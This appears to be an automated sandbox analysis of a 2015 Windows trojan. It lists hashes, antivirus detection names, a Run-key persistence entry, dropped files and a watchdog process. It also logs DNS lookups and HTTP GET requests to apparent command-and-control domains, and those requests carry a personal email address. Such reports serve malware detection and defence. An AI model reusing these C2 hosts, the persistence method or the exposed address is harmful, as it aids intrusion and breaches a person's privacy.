Analysis Date: 2015-08-30 09:13:03
MD5: 52f3c8322068b2b06d40046c66263271
SHA1: e0eb428e9477e6bb372cc5fa18ddd97f370f24e8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: e2e52efd39a91a892440a6a72c1ba150 sha1: dfaf3f8eef36186a44df79d8c212a22b0a1bb3f0 size: 292864
Section .rdata md5: 530649f44cd3e0ae41291c1fec5f00c0 sha1: 30fb8f699c354012cccaffa2335060bd238600c4 size: 35328
Section .data md5: 7c927fb57012d9c5d78da69a52ce8c88 sha1: d990d44a6087d181f632e94eec9354fe96c80163 size: 97792
Timestamp: 2014-10-30 10:27:04
Packer: Microsoft Visual C++ ?.?
PEhash: 9b869a75080d0c56ea2ca6ab24348e599213f371
IMPhash: e48e759688f08e0b9a16ad5f13f5f901
AV CA (E-Trust Ino): Win32/Tnega.XAXY!suspicious
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!52F3C8322068
AV Avira (antivir): TR/ATRAPS.Gen2
AV Twister: no_virus
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Downloader-TLD [Trj]
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004938ec1 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: Trojan.Agent.Win32.544757
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TROJ_FORUCON.BMC
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader12.8822
AV F-Secure: Gen:Variant.Symmi.22722

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Instrumentation Panel Health Log ➝ C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.g8tpd
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\aumpacvrxzp.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ienjqwldvmznzss\yavsntehma.exe"

Network Details:

DNS doctorwhite.net (Type: A) ➝ 157.112.152.45
DNS melbourneit.hotkeysparking.com (Type: A) ➝ 8.5.1.16
DNS doublepleasure.net (Type: A) ➝ 184.168.221.104
DNS desirewhite.net (Type: A) ➝ 93.115.38.30
DNS strengthwhite.net (Type: A) ➝ 95.211.230.75
DNS stillwhite.net (Type: A) ➝ 112.125.17.103
DNS buildingheart.net (Type: A) ➝ 184.168.221.38
DNS storebattle.net (Type: A) ➝ 141.8.224.169
DNS prettyperfect.net (Type: A) ➝ 174.120.222.114
HTTP GET http://doctorwhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://doubletoward.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://doublepleasure.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://desirewhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://strengthwhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://stillwhite.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://buildingheart.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://storebattle.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
HTTP GET http://prettyperfect.net/index.php?email=nicolae.stan@thermodesign.ro&method=post&len (User-Agent: blank)
Flows TCP: 192.168.1.1:1031 ➝ 157.112.152.45:80
Flows TCP: 192.168.1.1:1032 ➝ 8.5.1.16:80
Flows TCP: 192.168.1.1:1033 ➝ 184.168.221.104:80
Flows TCP: 192.168.1.1:1034 ➝ 93.115.38.30:80
Flows TCP: 192.168.1.1:1035 ➝ 95.211.230.75:80
Flows TCP: 192.168.1.1:1036 ➝ 112.125.17.103:80
Flows TCP: 192.168.1.1:1037 ➝ 184.168.221.38:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.224.169:80
Flows TCP: 192.168.1.1:1039 ➝ 174.120.222.114:80

Raw Pcap
Strings